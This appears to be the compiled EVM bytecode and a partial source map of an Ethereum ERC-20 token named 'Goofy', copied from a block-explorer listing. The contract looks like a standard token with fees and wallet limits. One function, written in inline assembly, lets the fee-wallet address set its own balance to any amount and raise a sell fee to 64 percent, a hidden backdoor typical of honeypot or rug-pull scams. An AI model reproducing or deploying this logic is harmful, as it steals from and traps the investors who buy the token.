0x60806040526004361061014f5760003560e01c80637d1db4a5116100b6578063a9059cbb1161006f578063a9059cbb146104be578063b5e02174146104fb578063cdf4bab914610524578063d54f7d5e1461054f578063dd62ed3e1461057a578063f2fde38b146105b757610182565b80637d1db4a5146103ac5780638d5f81e2146103d75780638da5cb5b1461040257806392f428701461042d57806395d89b4114610456578063a457c2d71461048157610182565b806342966c681161010857806342966c68146102bf5780634fbee193146102e857806351c6590a1461032557806370a0823114610341578063715018a61461037e578063751039fc1461039557610182565b806306fdde0314610187578063095ea7b3146101b257806318160ddd146101ef57806323b872dd1461021a578063313ce56714610257578063395093511461028257610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b6040516102119190611fd3565b60405180910390f35b34801561022657600080fd5b50610241600480360381019061023c9190611fee565b610645565b60405161024e9190611fa9565b60405180910390f35b34801561026357600080fd5b5061026c61071e565b604051610279919061205d565b60405180910390f35b34801561028e57600080fd5b506102a960048036038101906102a49190611f4e565b610727565b6040516102b69190611fa9565b60405180910390f35b3480156102cb57600080fd5b506102e660048036038101906102e19190612078565b6107da565b005b3480156102f457600080fd5b5061030f600480360381019061030a91906120a5565b6107ee565b60405161031c9190611fa9565b60405180910390f35b61033f600480360381019061033a9190612078565b610844565b005b34801561034d57600080fd5b50610368600480360381019061036391906120a5565b6108a1565b6040516103759190611fd3565b60405180910390f35b34801561038a57600080fd5b506103936108ea565b005b3480156103a157600080fd5b506103aa6108fe565b005b3480156103b857600080fd5b506103c161091a565b6040516103ce9190611fd3565b60405180910390f35b3480156103e357600080fd5b506103ec61094c565b6040516103f991906120e1565b60405180910390f35b34801561040e57600080fd5b50610417610976565b60405161042491906120e1565b60405180910390f35b34801561043957600080fd5b50610454600480360381019061044f9190612244565b61099f565b005b34801561046257600080fd5b5061046b610a87565b6040516104789190611e84565b60405180910390f35b34801561048d57600080fd5b506104a860048036038101906104a39190611f4e565b610ac4565b6040516104b59190611fa9565b60405180910390f35b3480156104ca57600080fd5b506104e560048036038101906104e09190611f4e565b610b91565b6040516104f29190611fa9565b60405180910390f35b34801561050757600080fd5b50610522600480360381019061051d9190612078565b610baf565b005b34801561053057600080fd5b50610539610bdd565b6040516105469190611fa9565b60405180910390f35b34801561055b57600080fd5b50610564610bf4565b60405161057191906120e1565b60405180910390f35b34801561058657600080fd5b506105a1600480360381019061059c919061228d565b610c1e565b6040516105ae9190611fd3565b60405180910390f35b3480156105c357600080fd5b506105de60048036038101906105d991906120a5565b610ca5565b005b60606040518060400160405280600581526020017f476f6f6679000000000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b6000600454905090565b6000610652848484610f0f565b6107138461065e610d3e565b61070e85604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106c4610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b600190509392505050565b60006012905090565b60006107d0610734610d3e565b846107cb8560076000610745610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b6107eb6107e5610d3e565b826118c2565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61084c611a65565b6001600860146101000a81548160ff021916908315150217905550610879610872610976565b3083610f0f565b6108838134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108f2611a65565b6108fc6000611bc8565b565b610906611a65565b612710600181905550612710600581905550565b6000610947612710610939600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6109a7611a65565b60c8815111156109ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e39061233f565b60405180910390fd5b6000600c905060005b8251811015610a82576001826000858481518110610a1657610a1561235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a7a906123bd565b9150506109f5565b505050565b60606040518060400160405280600581526020017f474f4f4659000000000000000000000000000000000000000000000000000000815250905090565b6000610b87610ad1610d3e565b84610b8285604051806060016040528060258152602001612c1c6025913960076000610afb610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b6001905092915050565b6000610ba5610b9e610d3e565b8484610f0f565b6001905092915050565b6010543314610bbd57600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cad611a65565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190611fd3565b60405180910390a3505050565b610f1a838383611cb8565b600080610f25610976565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610f935750610f63610976565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150857600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561103c5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561150757600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156110ec5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111425750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156111985750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611292576111c86127106111ba600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b83111561120a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120190612661565b60405180910390fd5b611235612710611227600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b61125084611242876108a1565b610d2890919063ffffffff16565b1115611291576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611288906126f3565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561131b57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156113bb5761134961271061133b600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b9150611374612710611366600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114665750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150657611494612710611486600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506114bf6127106114b1600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061151d8284610d2890919063ffffffff16565b905060008111156116bc57600083111561153c5761153b86846118c2565b5b60008211156116a6576115b98260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161169d9190611fd3565b60405180910390a35b6116b98185611dde90919063ffffffff16565b93505b61172884604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506117bd84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161185d9190611fd3565b60405180910390a3505050505050565b60008383111582906118b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ac9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611931576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192890612785565b60405180910390fd5b61199d81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119f581600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a599190611fd3565b60405180910390a35050565b611a6d610d3e565b73ffffffffffffffffffffffffffffffffffffffff16611a8b610976565b73ffffffffffffffffffffffffffffffffffffffff1614611ae1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad8906127f1565b60405180910390fd5b565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c610976565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b611fcd81611f18565b82525050565b6000602082019050611fe86000830184611fc4565b92915050565b60008060006060848603121561200757612006611eb0565b5b600061201586828701611f03565b935050602061202686828701611f03565b925050604061203786828701611f39565b9150509250925092565b600060ff82169050919050565b61205781612041565b82525050565b6000602082019050612072600083018461204e565b92915050565b60006020828403121561208e5761208d611eb0565b5b600061209c84828501611f39565b91505092915050565b6000602082840312156120bb576120ba611eb0565b5b60006120c984828501611f03565b91505092915050565b6120db81611eda565b82525050565b60006020820190506120f660008301846120d2565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61213982611e3a565b810181811067ffffffffffffffff8211171561215857612157612101565b5b80604052505050565b600061216b611ea6565b90506121778282612130565b919050565b600067ffffffffffffffff82111561219757612196612101565b5b602082029050602081019050919050565b600080fd5b60006121c06121bb8461217c565b612161565b905080838252602082019050602084028301858111156121e3576121e26121a8565b5b835b8181101561220c57806121f88882611f03565b8452602084019350506020810190506121e5565b5050509392505050565b600082601f83011261222b5761222a6120fc565b5b813561223b8482602086016121ad565b91505092915050565b60006020828403121561225a57612259611eb0565b5b600082013567ffffffffffffffff81111561227857612277611eb5565b5b61228484828501612216565b91505092915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b600061264b602883611dff565b9150612656826125ef565b604082019050919050565b6000602082019050818103600083015261267a8161263e565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b60006126dd602383611dff565b91506126e882612681565b604082019050919050565b6000602082019050818103600083015261270c816126d0565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061276f602183611dff565b915061277a82612713565b604082019050919050565b6000602082019050818103600083015261279e81612762565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006127db602083611dff565b91506127e6826127a5565b602082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b60008301896120d2565b6128786020830188611fc4565b6128856040830187612847565b6128926060830186612847565b61289f60808301856120d2565b6128ac60a0830184611fc4565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122018e97553b5274fce56182761920a512ade4cc1cf0b17eaaa5c70f169a70d3b0064736f6c63430008120033

Deployed Bytecode Sourcemap

20323:11886:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31909:10;;;;;;;;;;20323:11886;;;;;22919:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23683:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23414:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24508:321;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23011:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23861:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29288:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29151:128;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31936:270;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23103:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2892:103;;;;;;;;;;;;;:::i;:::-;;24838:138;;;;;;;;;;;;;:::i;:::-;;24366:133;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27513:96;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2242:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28773:370;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22824:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24088:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23231:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30582:382;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31773:84;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28656:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23523:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3151:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22919:83;22956:13;22989:5;;;;;;;;;;;;;;;;;22982:12;;22919:83;:::o;23683:169::-;23766:4;23783:39;23792:12;:10;:12::i;:::-;23806:7;23815:6;23783:8;:39::i;:::-;23840:4;23833:11;;23683:169;;;;:::o;23414:100::-;23467:7;23494:12;;23487:19;;23414:100;:::o;24508:321::-;24614:4;24631:36;24641:6;24649:9;24660:6;24631:9;:36::i;:::-;24678:121;24687:6;24695:12;:10;:12::i;:::-;24709:89;24747:6;24709:89;;;;;;;;;;;;;;;;;:11;:19;24721:6;24709:19;;;;;;;;;;;;;;;:33;24729:12;:10;:12::i;:::-;24709:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;24678:8;:121::i;:::-;24817:4;24810:11;;24508:321;;;;;:::o;23011:83::-;23052:5;20497:2;23070:16;;23011:83;:::o;23861:218::-;23949:4;23966:83;23975:12;:10;:12::i;:::-;23989:7;23998:50;24037:10;23998:11;:25;24010:12;:10;:12::i;:::-;23998:25;;;;;;;;;;;;;;;:34;24024:7;23998:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;23966:8;:83::i;:::-;24067:4;24060:11;;23861:218;;;;:::o;29288:91::-;29344:27;29350:12;:10;:12::i;:::-;29364:6;29344:5;:27::i;:::-;29288:91;:::o;29151:128::-;29218:4;29242:19;:29;29262:8;29242:29;;;;;;;;;;;;;;;;;;;;;;;;;29235:36;;29151:128;;;:::o;31936:270::-;2127:13;:11;:13::i;:::-;31016:4:::1;31005:8;;:15;;;;;;;;;;;;;;;;;;32078:46:::2;32088:7;:5;:7::i;:::-;32105:4;32112:11;32078:9;:46::i;:::-;32161:37;32175:11;32188:9;32161:13;:37::i;:::-;31054:5:::1;31043:8;;:16;;;;;;;;;;;;;;;;;;31936:270:::0;:::o;23103:119::-;23169:7;23196:9;:18;23206:7;23196:18;;;;;;;;;;;;;;;;23189:25;;23103:119;;;:::o;2892:103::-;2127:13;:11;:13::i;:::-;2957:30:::1;2984:1;2957:18;:30::i;:::-;2892:103::o:0;24838:138::-;2127:13;:11;:13::i;:::-;24917:5:::1;24892:22;:30;;;;24963:5;24933:27;:35;;;;24838:138::o:0;24366:133::-;24410:7;24437:54;21325:5;24437:40;24454:22;;24437:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;24430:61;;24366:133;:::o;27513:96::-;27560:7;27587:14;;;;;;;;;;;27580:21;;27513:96;:::o;2242:87::-;2288:7;2315:6;;;;;;;;;;;2308:13;;2242:87;:::o;28773:370::-;2127:13;:11;:13::i;:::-;28884:3:::1;28864:9;:16;:23;;28856:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;28940:51;28994:19;28940:73;;29031:6;29026:110;29047:9;:16;29043:1;:20;29026:110;;;29120:4;29085:18;:32;29104:9;29114:1;29104:12;;;;;;;;:::i;:::-;;;;;;;;29085:32;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;29065:3;;;;;:::i;:::-;;;;29026:110;;;;28845:298;28773:370:::0;:::o;22824:87::-;22863:13;22896:7;;;;;;;;;;;;;;;;;22889:14;;22824:87;:::o;24088:269::-;24181:4;24198:129;24207:12;:10;:12::i;:::-;24221:7;24230:96;24269:15;24230:96;;;;;;;;;;;;;;;;;:11;:25;24242:12;:10;:12::i;:::-;24230:25;;;;;;;;;;;;;;;:34;24256:7;24230:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;24198:8;:129::i;:::-;24345:4;24338:11;;24088:269;;;;:::o;23231:175::-;23317:4;23334:42;23344:12;:10;:12::i;:::-;23358:9;23369:6;23334:9;:42::i;:::-;23394:4;23387:11;;23231:175;;;;:::o;30582:382::-;30683:21;30677:28;30667:8;30664:42;30654:68;;30719:1;30716;30709:12;30654:68;30749:4;30743:11;30776:8;30771:3;30764:21;30821:14;30814:4;30809:3;30805:14;30798:38;30873:4;30868:3;30858:20;30901:6;30895:4;30888:20;30950:4;30944;30940:15;30925:13;30918:38;30653:304;;30582:382;:::o;31773:84::-;31817:4;31841:8;;;;;;;;;;;31834:15;;31773:84;:::o;28656:109::-;28705:7;28740:16;;;;;;;;;;;28725:32;;28656:109;:::o;23523:151::-;23612:7;23639:11;:18;23651:5;23639:18;;;;;;;;;;;;;;;:27;23658:7;23639:27;;;;;;;;;;;;;;;;23632:34;;23523:151;;;;:::o;3151:201::-;2127:13;:11;:13::i;:::-;3260:1:::1;3240:22;;:8;:22;;::::0;3232:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3316:28;3335:8;3316:18;:28::i;:::-;3151:201:::0;:::o;12442:98::-;12500:7;12531:1;12527;:5;;;;:::i;:::-;12520:12;;12442:98;;;;:::o;782:::-;835:7;862:10;855:17;;782:98;:::o;27940:344::-;28059:1;28042:19;;:5;:19;;;28034:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;28140:1;28121:21;;:7;:21;;;28113:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;28222:6;28192:11;:18;28204:5;28192:18;;;;;;;;;;;;;;;:27;28211:7;28192:27;;;;;;;;;;;;;;;:36;;;;28260:7;28244:32;;28253:5;28244:32;;;28269:6;28244:32;;;;;;:::i;:::-;;;;;;;;27940:344;;;:::o;25339:2165::-;25437:42;25453:6;25461:9;25472:6;25437:15;:42::i;:::-;25490:15;25520:14;25563:7;:5;:7::i;:::-;25553:17;;:6;:17;;;;:41;;;;;25587:7;:5;:7::i;:::-;25574:20;;:9;:20;;;;25553:41;25549:1296;;;25616:19;:27;25636:6;25616:27;;;;;;;;;;;;;;;;;;;;;;;;;25615:28;:63;;;;;25648:19;:30;25668:9;25648:30;;;;;;;;;;;;;;;;;;;;;;;;;25647:31;25615:63;25611:1223;;;25713:14;;;;;;;;;;;25703:24;;:6;:24;;;:66;;;;;25752:16;;;;;;;;;;;25731:38;;:9;:38;;;;25703:66;:102;;;;;25774:20;:31;25795:9;25774:31;;;;;;;;;;;;;;;;;;;;;;;;;25773:32;25703:102;:135;;;;;25810:20;:28;25831:6;25810:28;;;;;;;;;;;;;;;;;;;;;;;;;25809:29;25703:135;25699:470;;;25881:54;21325:5;25881:40;25898:22;;25881:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;25871:6;:64;;25863:117;;;;;;;;;;;;:::i;:::-;;;;;;;;;26050:59;21325:5;26050:45;26067:27;;26050:12;;:16;;:45;;;;:::i;:::-;:49;;:59;;;;:::i;:::-;26014:32;26039:6;26014:20;26024:9;26014;:20::i;:::-;:24;;:32;;;;: